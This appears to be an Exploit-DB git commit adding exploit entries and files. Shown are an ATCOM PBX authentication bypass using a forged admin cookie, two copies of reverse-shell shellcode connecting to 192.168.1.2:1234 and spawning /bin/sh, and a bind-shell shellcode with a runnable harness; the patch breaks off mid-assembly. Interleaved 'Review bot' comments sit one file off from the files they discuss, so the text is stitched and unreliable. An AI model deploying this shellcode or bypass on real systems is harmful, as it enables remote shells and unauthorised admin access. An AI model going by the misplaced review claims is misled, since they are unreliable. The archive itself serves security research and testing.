From 2815f48e2551ef739abb89be50461b28bd6526b2 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 17 Jun 2016 05:05:00 +0000 Subject: [PATCH] DB: 2016-06-17 12 new exploits Linux x86_64 - Reverse Shell Shellcode Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal Solarwinds Virtualization Manager - Privilege Escalation Blat 3.2.14 - Stack Overflow Linux/x86 - Bindshell with Configurable Port - 87 bytes Linux x86_64 Shellcode Null-Free Reverse TCP Shell Linux x86 TCP Bind Shell Port 4444 (656 bytes) Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass Roxy Fileman 1.4.4 - Arbitrary File Upload SlimCMS 0.1 - CSRF (Change Admin Password) --- files.csv | 12 + platforms/hardware/webapps/39962.txt | 45 +++ platforms/lin_x86-64/shellcode/39578.c | 84 ++++++ platforms/lin_x86-64/shellcode/39844.c | 83 +++++ platforms/lin_x86/shellcode/39815.c | 192 ++++++++++++ platforms/lin_x86/shellcode/39851.c | 278 +++++++++++++++++ platforms/linux/local/39967.txt | 51 ++++ platforms/multiple/shellcode/39885.c | 401 +++++++++++++++++++++++++ platforms/php/webapps/39963.txt | 27 ++ platforms/php/webapps/39964.html | 47 +++ platforms/php/webapps/39965.txt | 26 ++ platforms/windows/dos/39966.txt | 48 +++ platforms/windows/webapps/39968.txt | 99 ++++++ 13 files changed, 1393 insertions(+) create mode 100755 platforms/hardware/webapps/39962.txt create mode 100755 platforms/lin_x86-64/shellcode/39578.c create mode 100755 platforms/lin_x86-64/shellcode/39844.c create mode 100755 platforms/lin_x86/shellcode/39815.c create mode 100755 platforms/lin_x86/shellcode/39851.c create mode 100755 platforms/linux/local/39967.txt create mode 100755 platforms/multiple/shellcode/39885.c create mode 100755 platforms/php/webapps/39963.txt create mode 100755 platforms/php/webapps/39964.html create mode 100755 platforms/php/webapps/39965.txt create mode 100755 
platforms/windows/dos/39966.txt create mode 100755 platforms/windows/webapps/39968.txt
diff --git a/files.csv b/files.csv
index 03f1c7ea5..ee150be37 100755
--- a/files.csv
+++ b/files.csv
@@ -35792,6 +35792,7 @@ id,file,description,date,author,platform,type,port
 39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
 39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
 39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
+39578,platforms/lin_x86-64/shellcode/39578.c,"Linux x86_64 - Reverse Shell Shellcode",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0
 39580,platforms/php/webapps/39580.txt,"Disc ORGanizer - DORG - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80
 39581,platforms/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",hardware,webapps,80
@@ -35882,6 +35883,7 @@ id,file,description,date,author,platform,type,port
 39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
 39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
 39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0
+39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947
 39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80
 39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
 39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
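Review bot: The new row `39968,platforms/windows/webapps/39968.txt,...` is inserted between ids 39680 and 39682, so the id column stops being monotonic in this region; the same out-of-sequence placement happens in the hunks at `@@ -35901` (39967 after 39702), `@@ -35984` (39966 after 39792) and `@@ -36060` (39965 after 39877), while 39578, 39815, 39844, 39851 and 39962–39964 are placed in id order. The surrounding rows suggest the index is kept sorted by id, so these four rows presumably belong at the end of the file next to 39962–39964; if the order is intentional, the commit message should say so, since tooling that assumes a sorted index can mis-merge later additions.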
@@ -35901,6 +35903,7 @@ id,file,description,date,author,platform,type,port
 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86_64 - Read /etc/passwd - 65 bytes",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
 39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443
 39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation",2016-04-15,metasploit,linux,local,0
+39967,platforms/linux/local/39967.txt,"Solarwinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0
 39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
 39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
@@ -35984,6 +35987,7 @@ id,file,description,date,author,platform,type,port
 39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0
 39791,platforms/multiple/local/39791.rb,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,metasploit,multiple,local,0
 39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000
+39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0
 39794,platforms/windows/shellcode/39794.c,"All Windows Null-Free Shellcode - Functional Keylogger to File - 601 (0x0259) bytes",2016-05-10,Fugu,windows,shellcode,0
 39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash PoC",2016-05-10,"Mohammad Reza Espargham",windows,dos,0
 39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC",2016-05-10,"Zahid Adeel",windows,dos,0
@@ -36004,6 +36008,7 @@ id,file,description,date,author,platform,type,port
 39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
 39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80
 39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
+39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port - 87 bytes",2016-05-16,JollyFrogs,lin_x86,shellcode,0
 39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - Archive Path Traversal",2016-05-16,hyp3rlinx,php,webapps,0
 39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
 39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC",2016-05-16,HauntIT,windows,dos,0
@@ -36030,12 +36035,14 @@ id,file,description,date,author,platform,type,port
 39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0
 39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0
 39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
+39844,platforms/lin_x86-64/shellcode/39844.c,"Linux x86_64 Shellcode Null-Free Reverse TCP Shell",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
 39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0
 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
+39851,platforms/lin_x86/shellcode/39851.c,"Linux x86 TCP Bind Shell Port 4444 (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
 39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
 39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443
 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
@@ -36060,11 +36067,13 @@ id,file,description,date,author,platform,type,port
 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
+39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80
 39879,platforms/php/webapps/39879.txt,"Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0
 39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
 39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - CSRF Add Admin Exploit",2016-06-06,"Ali Ghanbari",php,webapps,80
+39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode",2016-06-06,odzhancode,multiple,shellcode,0
 39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0
 39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80
 39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,gsX,windows,local,0
@@ -36139,3 +36148,6 @@ id,file,description,date,author,platform,type,port
 39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0
 39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0
 39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0
+39962,platforms/hardware/webapps/39962.txt,"ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80
+39963,platforms/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80
+39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - CSRF (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80
diff --git a/platforms/hardware/webapps/39962.txt b/platforms/hardware/webapps/39962.txt
new file mode 100755
index 000000000..f36bf5b8f
--- /dev/null
+++ b/platforms/hardware/webapps/39962.txt
@@ -0,0 +1,45 @@
+# Title: ATCOM PBX system , auth bypass exploit
+# Author: i-Hmx
+# contact : n0p1337@gmail.com
+# Home : sec4ever.com
+# Tested on : ATCOM IP01 , IP08 , IP4G and ip2G4A
+
+Details
+The mentioned system is affected by auth bypass flaw that allow an attacker to get admin access on the vulnerable machine without perior access
+The security check is really stupid , depend on js
+affected lines
+
+js/util.js
+function alertWithoutLogin(){
+ var username = getCookie("username");
+ //alert(username);
+ if(!!!username){
+ alert('Sorry, permission denied. Please login first!');
+ }
+}
+
+so actually it just check if username value exist in cookies
+and if not , redirect to login.html
+just like that!!!!!!!!!!!!!
+
+exploitation?!
+just from browser , press f12 , open console
+type document.cookie="username=admin"
+or from burp intercept proxy and set the cookies as well
+go to ip/admin/index.html
+and you are in , simple like that :/
+
+Demo request
+
+GET /admin/index.html HTTP/1.1
+Host: 192.168.44.12
+User-Agent: Mozilla/1.0 (Windows NT 3.3; WOW32; rv:60.0) Gecko/20010101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: username=admin
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+From Eg-R1z with love
+./Faris
\ No newline at end of file
diff --git a/platforms/lin_x86-64/shellcode/39578.c b/platforms/lin_x86-64/shellcode/39578.c
new file mode 100755
index 000000000..1aaa59f97
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39578.c
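Review bot: The write-up says the client-side check "redirect[s] to login.html", but the quoted `alertWithoutLogin()` only calls `alert(...)` and never navigates, so the description contradicts the code it cites; either quote the redirecting code or reword the sentence to "shows an alert". The header also has no vendor or fix status line, so a defender reading the entry cannot tell whether fixed firmware exists; a line such as `# Fix: <unknown / not reported>` would make that explicit. The root cause worth naming for defenders is that `/admin/index.html` is served without any server-side session validation, which is what a fix has to add.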
@@ -0,0 +1,84 @@
+/*
+# Exploit Title: Shellcode [Linux x86_64 Reverse Shell]
+# Date: 19/03/2016
+# Shellcode Author: Sudhanshu Chauhan
+# LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan
+# Tested on: [Ubuntu 14.04.1 x86_64]
+
+global _start
+
+
+_start:
+
+ ;Socket
+ xor rax, rax
+ xor rdi, rdi
+ xor rsi, rsi
+ xor rdx, rdx
+ add rax, 41
+ add rdi, 2
+ add rsi, 1
+ syscall
+
+ ; copy socket descriptor
+ mov rdi, rax
+
+ ; Socket details IP- 192.168.1.2 Port- 1234
+ xor rax, rax
+ push rax
+ mov dword [rsp-4], 0x0201a8c0
+ mov word [rsp-6], 0xd204
+ sub rsp, 6
+ push word 0x2
+
+
+ ;connect
+ xor rax, rax
+ xor rdx, rdx
+ add rax, 42
+ mov rsi, rsp
+ add rdx, 16
+ syscall
+
+
+ ;duplicate sockets
+ xor rax, rax
+ add rax, 33
+ xor rsi, rsi
+ syscall
+
+ mov al, 33
+ add rsi, 1
+ syscall
+
+ mov al, 33
+ add rsi, 1
+ syscall
+
+ ; execve
+ xor rax, rax
+ push rax
+ mov rbx, 0x68732f2f6e69622f
+ push rbx
+ mov rdi, rsp
+ push rax
+ mov rdx, rsp
+ push rdi
+ mov rsi, rsp
+ add rax, 59
+ syscall
+
+*/
+
+#include
+#include
+unsigned char code[] = \
+"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x04\xd2\x48\x83\xec\x06\x66\x6a\x02\x48\x31\xc0\x48\x31\xd2\x48\x83\xc0\x2a\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
+
+main()
+{
+ printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+
diff --git a/platforms/lin_x86-64/shellcode/39844.c b/platforms/lin_x86-64/shellcode/39844.c
new file mode 100755
index 000000000..b1b6609b4
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39844.c
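Review bot: `main()` is declared with an implicit `int` return type and no `return`, and the two `#include` directives carry no header name as rendered here (presumably `<stdio.h>` and `<string.h>` lost in extraction); `int main(void)` with a trailing `return 0;` compiles cleanly under C99 and later. Unlike 39815.c in this same commit, the file gives no build line, yet jumping into `code[]` only works when the data segment is executable (for example `gcc -z execstack`), so a `// Compile:` comment stating that requirement belongs in the header block. The header also omits the "Tested on" kernel/hardening state, which matters because the harness behaves differently under NX-enforcing defaults.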
@@ -0,0 +1,83 @@
+/*
+# Exploit Title: Shellcode [Linux x86_64 Reverse Shell]
+# Date: 19/03/2016
+# Shellcode Author: Sudhanshu Chauhan
+# LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan
+# Tested on: [Ubuntu 14.04.1 x86_64]
+
+global _start
+
+
+_start:
+
+ ;Socket
+ xor rax, rax
+ xor rdi, rdi
+ xor rsi, rsi
+ xor rdx, rdx
+ add rax, 41
+ add rdi, 2
+ add rsi, 1
+ syscall
+
+ ; copy socket descriptor
+ mov rdi, rax
+
+ ; Socket details IP- 192.168.1.2 Port- 1234
+ xor rax, rax
+ push rax
+ mov dword [rsp-4], 0x0201a8c0
+ mov word [rsp-6], 0xd204
+ sub rsp, 6
+ push word 0x2
+
+
+ ;connect
+ xor rax, rax
+ xor rdx, rdx
+ add rax, 42
+ mov rsi, rsp
+ add rdx, 16
+ syscall
+
+
+ ;duplicate sockets
+ xor rax, rax
+ add rax, 33
+ xor rsi, rsi
+ syscall
+
+ mov al, 33
+ add rsi, 1
+ syscall
+
+ mov al, 33
+ add rsi, 1
+ syscall
+
+ ; execve
+ xor rax, rax
+ push rax
+ mov rbx, 0x68732f2f6e69622f
+ push rbx
+ mov rdi, rsp
+ push rax
+ mov rdx, rsp
+ push rdi
+ mov rsi, rsp
+ add rax, 59
+ syscall
+
+*/
+
+#include
+#include
+unsigned char code[] = \
+"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x04\xd2\x48\x83\xec\x06\x66\x6a\x02\x48\x31\xc0\x48\x31\xd2\x48\x83\xc0\x2a\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
+
+main()
+{
+ printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/39815.c b/platforms/lin_x86/shellcode/39815.c
new file mode 100755
index 000000000..7e9997f8c
--- /dev/null
+++ b/platforms/lin_x86/shellcode/39815.c
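Review bot: As rendered here this file is identical to platforms/lin_x86-64/shellcode/39578.c from the same commit (same header with "Date: 19/03/2016", same assembly listing, same `code[]` string) apart from the missing trailing newline, yet files.csv indexes it as a separate entry "Linux x86_64 Shellcode Null-Free Reverse TCP Shell" dated 2016-05-20. Either one of the two rows should be dropped, or the header should state what differs, since the "Null-Free" property claimed by the index is not mentioned anywhere in the file itself. The `main()` remarks on 39578.c (implicit `int` return, empty `#include` lines, no build note) apply here unchanged.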
@@ -0,0 +1,192 @@
+/*===================================================================*/
+/*
+ Filename: bindshell.c
+ Author: JollyFrogs (LookoutFrog@gmail.com)
+
+ License: This work is licensed under a Creative Commons
+ Attribution-NonCommercial 4.0 International License.
+
+ Compile:
+ gcc -m32 -fno-stack-protector -z execstack bindshell.c -o bindshell
+*/
+
+#include
+#include
+#include
+
+unsigned char shellcode[] = \
+"\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97"
+"\x5b\x58\x66\xb8\x15\xb3\x66\x50\x66\x53\x89\xe1\x31\xc0\xb0\x10"
+"\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x50\x57\xb0\x66\x43\x43\x89"
+"\xe1\xcd\x80\xb0\x66\x43\xcd\x80\x93\x87\xcf\x49\xb0\x3f\xcd\x80"
+"\x75\xf9\x50\x59\x50\x5a\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f"
+"\x62\x69\x6e\x87\xe3\xcd\x80";
+
+static bool shellcode_zerocheck() {
+ // initialize counter
+ int i = 0;
+ // check each byte in shellcode array for hexidecimal zero value, return false if zero found
+ for(i = 0; i < sizeof(shellcode)-1; i++) {if (shellcode[i] == '\x00') return false;}
+ // Return true if no zeroes found
+ return true;
+}
+
+static bool shellcode_setport(char *buf, int port) {
+ // Check if decimal port is valid
+ if (port<1024 || port>65535) return false;
+ // The offset of the port is 21, but reduce by 1 since the array counts from 0
+ int shellcode_port_offset = 20; // (\x15\xb3)
+ // convert decimal port to hexidecimal
+ *(short *)(buf+shellcode_port_offset) = port; // (\x15\xb3) - shellcode array counts from 0
+ // Swap port bytes to accomodate for Little Endian memory structure
+ char tmp = buf[shellcode_port_offset];
+ buf[shellcode_port_offset] = buf[shellcode_port_offset+1];
+ buf[shellcode_port_offset+1] = tmp;
+ // Check if the hexidecimal port contains zeroes, if it does then show an error
+ if (shellcode[20] == '\x00' || shellcode[21] == '\x00') {
+ printf("port HEX contains zeroes\n"); return false;
+ }
+ // Return true if all checks passed
+ return true;
+}
+
+main () {
+
// Port in decimal - should be higher than 1024 and lower than 65536
+ int port = 1234;
+ // Basic error checking
+ if (!shellcode_setport(shellcode, port)) {printf("ERROR: Invalid port\n");return 0;}
+ if (!shellcode_zerocheck()) {printf("ERROR: Shellcode contains zeroes\n");return 0;}
+ // Print shellcode length.
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+ // Run assembly commands
+ __asm__ (
+ // Initialize registers
+ "movl $0x12345678, %eax\n\t"
+ "movl $0x12345678, %ebx\n\t"
+ "movl $0x12345678, %ecx\n\t"
+ "movl $0x12345678, %edx\n\t"
+ "movl $0x12345678, %edi\n\t"
+ "movl $0x12345678, %esi\n\t"
+ "movl $0x12345678, %ebp\n\t"
+ // execute shellcode
+ "jmp shellcode");
+}
+
+/* Assembly source of shellcode:
+
+global _start
+
+section .text
+_start:
+ ; parameters for SOCKET(2) are placed on the stack in reverse order
+ ; SOCKET(2) Synopsis: int socket(int domain, int type, int protocol);
+ ; Before instruction "int 0x80" the stack should look like:
+ ; 02 00 00 00 01 00 00 00 00 00 00 00
+ ; ^AF_INET ^S_STREAM ^TCP
+
+ xor eax, eax ; EAX = 00000000
+ push eax ; PUSH 00000000 (TCP)
+ inc eax ; EAX = 00000001
+ push eax ; PUSH 00000001 (SOCK_STREAM)
+ pop ebx ; EBX = 00000001 (SOCKETCALL.SOCKET)
+ push eax ; PUSH 00000001 (SOCK_STREAM)
+ inc eax ; EAX = 00000002
+ push eax ; PUSH 00000002 (AF_INET)
+
+ ; invoke socketcall to create the socket
+ mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
+
+ mov ecx, esp ; ECX = points to top of stack (0xBFFFF3E4)
+
+ int 0x80 ; SYSCALL SOCKETCALL(2)-SOCKET(2)
+
+ xchg edi, eax ; store fd in edi
+
+ ; parameters for BIND(2) are placed on the stack in reverse order
+ ; BIND(2) Synopsis: int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
+ ; Before instruction "int 0x80" the stack should look like:
+ ; 07 00 00 00 xx xx xx xx 10 00 00 00 02 00 b3 15 00 00 00 00
+ ; ^FD ^ ^structlen ^AFNT ^port ^in_addr
+ ; | PTR to ---------------^
+
+ pop ebx ; EBX = 00000002 (SOCKETCALL.BIND)
+ pop eax ; EAX = 
00000001
+ ; Note: Stack = 00000000
+ mov ax, 0xB315 ; EAX = 0000B315 (5555 reversed)
+ push ax ; PUSH B315 (sockaddr_2)
+ push bx ; PUSH 0002 (sockaddr_3)
+ mov ecx, esp ; ECX = ESP (0xBFFFF3E8)
+ xor eax, eax ; EAX = 00000000
+ mov al, 0x10 ; EAX = 00000010
+ push eax ; PUSH 00000010 (len(sockaddr))
+ push ecx ; PUSH (*ADDR) (ptr to sockaddr)
+ push edi ; push (FD) (SOCKFD)
+
+ ; invoke socketcall to bind the socket to IP and port
+ mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
+ mov ecx, esp ; ECX = points to top of stack (0xBFFFF3DC)
+
+ int 0x80 ; SYSCALL SOCKETCALL(2)-BIND(2)
+
+ ; parameters for LISTEN(2) are placed on the stack in reverse order
+ ; LISTEN(2) Synopsis: listen(int sockfd, int backlog)
+ ; Before instruction "int 0x80" the stack should look like:
+ ; 07 00 00 00 00 00 00 00
+ ; ^FD ^Backlog = 0
+
+ ; Note that EAX = 00000000 due to return code from SOCKETCALL above
+ push eax ; PUSH 00000000 (Backlog)
+ push edi ; PUSH (FD) (SOCKFD)
+
+ ; invoke socketcall to set the socket in listen mode
+ mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
+ inc ebx ; EBX = 00000003
+ inc ebx ; EBX = 00000004 (SOCKETCALL.LISTEN)
+ mov ecx, esp ; ECX = points to top of stack (0xBFFFF3D4)
+ int 0x80 ; SYSCALL SOCKETCALL(2)-LISTEN(2)
+ ; Note: The selected port is opened on the system and listening
+
+ ; parameters for ACCEPT(2) are placed on the stack in reverse order
+ ; ACCEPT(2) Synopsis: int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+ ; Before instruction "int 0x80" the stack should look like:
+ ; 07 00 00 00 00 00 00 00 00 00 00 00
+
+ ; Note that EAX is set to 0 upon successful execution of SOCKETCALL.LISTEN
+ ; Note that stack at 0xBFFFF3D4 already contains what I need:
+ ; 07 00 00 00 00 00 00 00 00 00 00 00
+ ; invoke socketcall to set the socket to accept connections
+ mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
+ inc ebx ; EBX = 00000005 (SOCKETCALL.ACCEPT)
+ int 0x80 ; SYSCALL SOCKETCALL(2)-ACCEPT(2)
+
+ ; use syscal DUP2(2) to copy the 
stdin(0), stdout(1) and stderr(2)
+ ; DUP2(2) Synopsis: int dup2(int oldfd, int newfd);
+ xchg eax, ebx ; EBX = CFD, EAX = 00000005
+ xchg ecx, edi ; ECX = 00000007
+ ; XCHG ECX, EDI saves us having to zero out ecx and then MOV 3
+
+redirect:
+ dec ecx ; ECX = 00000002 (eventually)
+ mov al, 0x3f ; DUP2(2) (3 times - ECX=2, ECX=1, ECX=0)
+ int 0x80 ; SYSCALL DUP2(2) (ECX=2, ECX=1, ECX=0)
+ jnz redirect ;
+
+ ; spawn /bin/sh shell
+ ; Note that EAX is set to 00000000 upon last succesful execution of DUP2
+ push eax ; PUSH 00000000 (NULL byte)
+ pop ecx ; ECX = 00000000 (EXECVE ARGV)
+ push eax ; PUSH 00000000 (NULL byte)
+ pop edx ; EDX = 00000000 (EXECVE ENVP)
+
+ ; push '/bin//sh, 0' on stack
